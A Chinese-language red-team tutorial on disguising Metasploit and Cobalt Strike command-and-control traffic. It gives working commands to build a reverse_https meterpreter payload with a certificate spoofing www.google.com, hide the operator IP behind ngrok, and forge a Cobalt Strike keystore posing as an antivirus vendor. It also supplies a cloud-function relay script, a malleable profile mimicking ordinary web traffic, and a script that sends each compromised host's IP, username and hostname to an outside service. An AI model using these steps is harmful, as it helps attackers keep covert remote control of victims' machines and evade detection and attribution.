通信特征的隐藏

简介

流量的东西大概做的几个方向：

1. IP
2. 内容

我们的目的就是尽可能的贴近目标平时的网络环境流量，把容易看懂的变成不容易看懂的内容。

MSF使用https监听

SSL证书可以把http流量加密成密文这是众所皆知的。我们可以通过自己生成ssl证书，或者去申请证书用来监听给流量加密。这里为了实验，使用的是openssl自己生成证书的方式。

生成ssl证书

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt

最后会在该目录下生成出一个www.google.com.pem的文件，为了方便，改名为server.pem。

生成https的payload

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.128.128 lport=4444 PayloadUUIDTracking=true HandlerSSLCert=server.pem PayloadUUIDName=solkatt  -f exe -o payload.exe

这里的PayloadUUIDTracking是为了防止有人恶意链接该payload而生成的，但是如果不开启postsql数据库没有什么效果。HandlerSSLcert用来指定刚才生成的证书。Payloaduuidname是指定uuid名称。

生成https的监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 4444

show advanced
set handlersslcert server.pem
set payloaduuid solkatt
set payloaduuidtracking true


run

生成后连接使用wireshark来抓取流量包。可以发现流量都是经过加密了的。

PS:一定要注意保护好自己的server.pem。如果证书泄露依然会有被溯源的风险。

MSF使用NGROCK隐藏IP地址

端口转发一直是隐藏IP的好方式。除了NGRCOK，相同的软件还有frp，花生壳等。

ngrock规避我们的可识别的IP或者身份，在公网上的一种多客户的服务方案。

在官网注册开通服务后，首先下载对应的机器的版本

下到机器后运行./sunny clientid 你自己得通道id，启动监听

接下来去msf中生成链接ngrock服务器得payload。其中payload的lhost是ngork的服务器名字，端口也是ngrock的

msf开启监听，监听时选择的端口是ngrock映射到我们本地的端口80.

然后通过资源监视器找到我们的payload的名字的exe查看远程链接地址为：

可以看到去的地址是腾讯云的，因此隐藏了IP地址。

CS

1.修改默认端口

cs的默认端口为50050，这个是很明显的特征，可以在配置文件teamserver中修改

#!/bin/bash
#
# Start Cobalt Strike Team Server
#

# make pretty looking messages (thanks Carlos)
function print_good () {
    echo -e "\x1B[01;32m[+]\x1B[0m $1"
}

function print_error () {
    echo -e "\x1B[01;31m[-]\x1B[0m $1"
}

function print_info () {
    echo -e "\x1B[01;34m[*]\x1B[0m $1"
}

# check that we're r00t
if [ $UID -ne 0 ]; then
        print_error "Superuser privileges are required to run the team server"
        exit
fi

# check if java is available...
if [ $(command -v java) ]; then
        true
else
        print_error "java is not in \$PATH"
        echo "    is Java installed?"
        exit
fi

# check if keytool is available...
if [ $(command -v keytool) ]; then
        true
else
        print_error "keytool is not in \$PATH"
        echo "    install the Java Developer Kit"
        exit
fi

# generate a certificate
        # naturally you're welcome to replace this step with your own permanent certificate.
        # just make sure you pass -Djavax.net.ssl.keyStore="/path/to/whatever" and
        # -Djavax.net.ssl.keyStorePassword="password" to java. This is used for setting up
        # an SSL server socket. Also, the SHA-1 digest of the first certificate in the store
        # is printed so users may have a chance to verify they're not being owned.
if [ -e ./cobaltstrike.store ]; then
        print_info "Will use existing X509 certificate and keystore (for SSL)"
else
        print_info "Generating X509 certificate and keystore (for SSL)"
        keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"
fi

# start the team server.
java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=5555 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer $*

-Dcobaltstrike.server_port=5555 这里可以修改默认端口

2.修改证书

cs的默认证书cobaltstrike.store是有很明显的cs特征。

我们可以自己生成一个新的证书，接着用来替换原来的。

kali中输入

keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias huorong.com -dname "CN=us OU=huorong.com O=software,L=chongqing,S=chongqing,C=CN"

替换成功证书。

PS：当然更加推荐去服务商申请一个相关证书。

3.profile

https://www.cobaltstrike.com/downloads/csmanual44.pdf

cs可以自定义很多特征，详细信息可以查看官方文档。

4.云函数

什么是云函数：

相当于一个只有一个编程语言的一个docker。

一个有公网地址的负责数据请求的处理和转发这样一个单一功能的一个东西。

限制条件：teamserver必须部署在公网IP上。

步骤：

1.配置腾讯云上云函数。

在函数编辑器里面写上以下代码

# -*- coding: utf8 -*-
import json,requests,base64
def main_handler(event, context):
    response = {}
    path = None
    headers = None
    try:
        C2='http://IP:PORT'
        if 'path' in event.keys():
            path=event['path']
        if 'headers' in event.keys():    
            headers=event['headers']
        if 'httpMethod' in event.keys() and event['httpMethod'] == 'GET' :
            resp=requests.get(C2+path,headers=headers,verify=False) 
        else:
            resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)
            print(resp.headers)
            print(resp.content)
        response={
            "isBase64Encoded": True,
            "statusCode": resp.status_code,
            "headers": dict(resp.headers),
            "body": str(base64.b64encode(resp.content))[2:-1]
        }
    except Exception as e:
        print(e)
    finally:
        return response

2.配置触发器

之后去cs下面默认的havex.profile修改参数,只需要去替换里面相应的东西就好。

set sleeptime "5000";
set jitter    "0";
set maxdns    "255";
set useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0";

http-get {

    set uri "/api/x";

    client {
        header "Accept" "*/*";
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Server" "nginx";
        output {
            base64;
            print;
        }
    }
}
http-stager {  
    set uri_x86 "/vue.min.js";
    set uri_x64 "/bootstrap-2.min.js";
}
http-post {
    set uri "/api/y";
    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {
            base64;
            print;
        }
    }
}

之后测试上线

记得在创造监听器的时候，要选择云函数对应的监听器

上线成功，查看流向的IP地址

5.联动server酱

在本地新建一个server.cna

# 循环获取所有beacon
on beacon_initial {

        sub http_get {
                local('$output');
                $url = [new java.net.URL: $1];
                $stream = [$url openStream];
                $handle = [SleepUtils getIOHandle: $stream, $null];

                @content = readAll($handle);

                foreach $line (@content) {
                        $output .= $line . "\r\n";
                }

                println($output);
        }
        #获取ip、计算机名、登录账号
        $internalIP = replace(beacon_info($1, "internal"), " ", "_");
        $userName = replace(beacon_info($1, "user"), " ", "_");
    $computerName = replace(beacon_info($1, "computer"), " ", "_");

        #get一下Server酱的链接
        $url = 'https://sc.ftqq.com/这里填自己的serverapi.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0Aip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;

        http_get($url);

}

在cobalt Strike->script manage里面即可添加插件

重新上线，server酱获得消息